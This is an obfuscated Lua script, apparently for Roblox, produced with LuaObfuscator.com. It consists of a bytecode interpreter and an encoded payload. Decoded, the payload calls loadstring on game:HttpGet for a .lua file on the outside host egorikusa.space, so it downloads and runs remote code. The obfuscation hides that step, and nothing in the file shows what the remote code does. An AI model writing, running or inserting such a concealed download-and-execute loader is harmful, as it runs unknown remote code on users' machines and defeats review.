--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v87=v5(v79,v19);v19=nil;return v87;else return v79;end end end);local function v20(v31,v32,v33) if v33 then local v80=(0 + 0) -0 ;local v81;while true do if (v80==0) then v81=(v31/(((882 -(282 + 595)) -3)^(v32-(1 -(1637 -(1523 + 114))))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v81-(v81%(569 -(367 + 201))) ;end end else local v82=(2 + 0)^(v32-(928 -((304 -90) + 713))) ;return (((v31%(v82 + v82))>=v82) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + (24134629 -11077846))) + (v39 * (66493 -(892 + (118 -53)))) + (v38 * (610 -354)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=351 -(87 + 263) ;local v44=(v20(v42,(568 -387) -(67 + 113) ,20) * (2^(24 + (26 -(10 + 8))))) + v41 ;local v45=v20(v42,51 -30 ,(88 -65) + 8 );local v46=((v20(v42,127 -95 )==((1395 -(416 + 26)) -(802 + 150))) and  -(2 -1)) or (1 -0) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (997 -((2921 -2006) + 82 + 0)) ;else local v88=0 -0 ;while true do if (v88==(0 + 0)) then v45=1 -0 ;v43=1187 -(1069 + 118) ;break;end end end elseif (v45==(4643 -2596)) then return ((v44==(791 -(368 + 423))) and (v46 * ((1 -0)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/(2^(91 -39)))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(438 -(145 + 293))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(431 -(44 + 386)) );v18=v18 + v47 ;local v49={};for v63=1487 -(998 + 488) , #v48 do v49[v63]=v2(v1(v3(v48,v63,v63)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v50==(1026 -(706 + 318))) then for v89=699 -(208 + 490) ,v23() do local v90=0;local v91;local v92;while true do if (v90==0) then local v106=0;local v107;while true do if (v106==(0 + 0)) then v107=0;while true do if (v107~=(1 + 0)) then else v90=837 -(660 + 176) ;break;end if (v107==(0 + 0)) then v91=700 -(271 + 429) ;v92=nil;v107=1;end end break;end end end if (v90==1) then while true do if (v91~=(0 + 0)) then else v92=v21();if (v20(v92,1,1)==(202 -(14 + 188))) then local v135=1086 -(461 + 625) ;local v136;local v137;local v138;local v139;while true do if (v135~=(675 -(534 + 141))) then else local v154=0 + 0 ;local v155;while true do if (v154==0) then v155=0 + 0 ;while true do if (v155~=(1 + 0)) then else v135=1 + 0 ;break;end if (0~=v155) then else v136=0;v137=nil;v155=1 -0 ;end end break;end end end if (v135~=2) then else while true do if (v136~=(1 + 0)) then else local v159=0 -0 ;while true do if (v159==1) then v136=5 -3 ;break;end if (v159~=(529 -(406 + 123))) then else v139={v22(),v22(),nil,nil};if (v137==(0 + 0)) then local v167=0 + 0 ;local v168;while true do if ((1322 -(1249 + 73))==v167) then v168=0 + 0 ;while true do if (v168~=(1145 -(466 + 679))) then else v139[2 + 1 ]=v22();v139[9 -5 ]=v22();break;end end break;end end elseif (v137==1) then v139[8 -5 ]=v23();elseif (v137==(1902 -(106 + 1794))) then v139[3]=v23() -(2^(412 -(115 + 281))) ;elseif (v137~=(1 + 2)) then else local v177=0 -0 ;local v178;while true do if (v177~=(0 + 0)) then else v178=0 -0 ;while true do if (v178~=0) then else v139[7 -4 ]=v23() -((7 -5)^(883 -(550 + 317))) ;v139[4]=v22();break;end end break;end end end v159=1 -0 ;end end end if ((2 -0)==v136) then local v160=584 -(57 + 527) ;local v161;while true do if (v160~=(0 -0)) then else v161=1427 -(41 + 1386) ;while true do if ((285 -(134 + 151))~=v161) then else if (v20(v138,1 + 0 ,1)~=(1 -0)) then else v139[5 -3 ]=v56[v139[2]];end if (v20(v138,1667 -(970 + 695) ,3 -1 )==(1991 -(582 + 1408))) then v139[9 -6 ]=v56[v139[10 -7 ]];end v161=1;end if (v161~=(1 + 0)) then else v136=3 -0 ;break;end end break;end end end if (v136~=(0 + 0)) then else local v162=0;local v163;while true do if (v162==(0 -0)) then v163=1824 -(1195 + 629) ;while true do if ((1 -0)~=v163) then else v136=66 -(30 + 35) ;break;end if (v163==(241 -(187 + 54))) then v137=v20(v92,782 -(162 + 618) ,3 + 0 );v138=v20(v92,15 -11 ,4 + 2 );v163=1;end end break;end end end if (v136==(6 -3)) then if (v20(v138,583 -(361 + 219) ,4 -1 )==(1 + 0)) then v139[1640 -(1373 + 263) ]=v56[v139[1004 -(451 + 549) ]];end v51[v89]=v139;break;end end break;end if (v135~=(1 + 0)) then else local v156=0 -0 ;while true do if (v156~=1) then else v135=2 -0 ;break;end if (v156~=(1384 -(746 + 638))) then else v138=nil;v139=nil;v156=1 + 0 ;end end end end end break;end end break;end end end for v93=1,v23() do v52[v93-(1 -0) ]=v28();end return v54;end if (v50~=(341 -(218 + 123))) then else local v85=0 -0 ;while true do if (v85~=(1581 -(1535 + 46))) then else v51={};v52={};v85=1;end if (v85==(1 + 0)) then v53={};v54={v51,v52,nil,v53};v85=2;end if (2~=v85) then else v50=1;break;end end end if (v50==(1 + 0)) then v55=v23();v56={};for v95=1 -0 ,v55 do local v96=1467 -(899 + 568) ;local v97;local v98;local v99;while true do if (v96~=1) then else v99=nil;while true do if (v97~=(0 + 0)) then else local v108=850 -(20 + 830) ;local v109;while true do if (v108==(0 + 0)) then v109=0 -0 ;while true do if (v109==0) then v98=v21();v99=nil;v109=604 -(268 + 335) ;end if (v109==(291 -(60 + 230))) then v97=573 -(426 + 146) ;break;end end break;end end end if (v97==(1 + 0)) then if (v98==1) then v99=v21()~=(1456 -(282 + 1174)) ;elseif (v98==(813 -(569 + 242))) then v99=v24();elseif (v98==(1 + 2)) then v99=v25();end v56[v95]=v99;break;end end break;end if (v96==0) then v97=0 -0 ;v98=nil;v96=1;end end end v54[1 + 2 ]=v21();v50=2;end end end local function v29(v57,v58,v59) local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...) local v65=v60;local v66=v61;local v67=v62;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v83=0,v73 do if (v83>=v67) then v71[v83-v67 ]=v72[v83 + 1 ];else v75[v83]=v72[v83 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do local v84=0;while true do if (1==v84) then if (v78<=3) then if (v78<=1) then if (v78>0) then v75[v77[2]]=v77[3]~=0 ;else local v112;local v113,v114;local v115;local v116;v75[v77[2]]=v59[v77[3]];v69=v69 + 1 ;v77=v65[v69];v75[v77[2]]=v59[v77[3]];v69=v69 + 1 ;v77=v65[v69];v116=v77[2];v115=v75[v77[3]];v75[v116 + 1 ]=v115;v75[v116]=v115[v77[4]];v69=v69 + 1 ;v77=v65[v69];v75[v77[2]]=v77[3];v69=v69 + 1 ;v77=v65[v69];v75[v77[2]]=v77[3]~=0 ;v69=v69 + 1 ;v77=v65[v69];v116=v77[2];v113,v114=v68(v75[v116](v13(v75,v116 + 1 ,v77[3])));v70=(v114 + v116) -1 ;v112=0;for v140=v116,v70 do v112=v112 + 1 ;v75[v140]=v113[v112];end v69=v69 + 1 ;v77=v65[v69];v116=v77[2];v75[v116]=v75[v116](v13(v75,v116 + 1 ,v70));v69=v69 + 1 ;v77=v65[v69];v75[v77[2]]();v69=v69 + 1 ;v77=v65[v69];do return;end end elseif (v78>2) then local v126=0;local v127;local v128;while true do if (v126==1) then v75[v127 + 1 ]=v128;v75[v127]=v128[v77[4]];break;end if (0==v126) then v127=v77[2];v128=v75[v77[3]];v126=1;end end else v75[v77[2]]=v77[3];end elseif (v78<=5) then if (v78==4) then v75[v77[2]]();else local v131=v77[2];v75[v131]=v75[v131](v13(v75,v131 + 1 ,v70));end elseif (v78<=6) then v75[v77[2]]=v59[v77[3]];elseif (v78>7) then local v143=v77[2];local v144,v145=v68(v75[v143](v13(v75,v143 + 1 ,v77[3])));v70=(v145 + v143) -1 ;local v146=0;for v152=v143,v70 do local v153=0;while true do if (v153==0) then v146=v146 + 1 ;v75[v152]=v144[v146];break;end end end else do return;end end v69=v69 + 1 ;break;end if (v84==0) then v77=v65[v69];v78=v77[1];v84=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F65676F72696B7573612E73706163652F3665323062353166643135313837656639353337643235642E6C756100093O00124O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
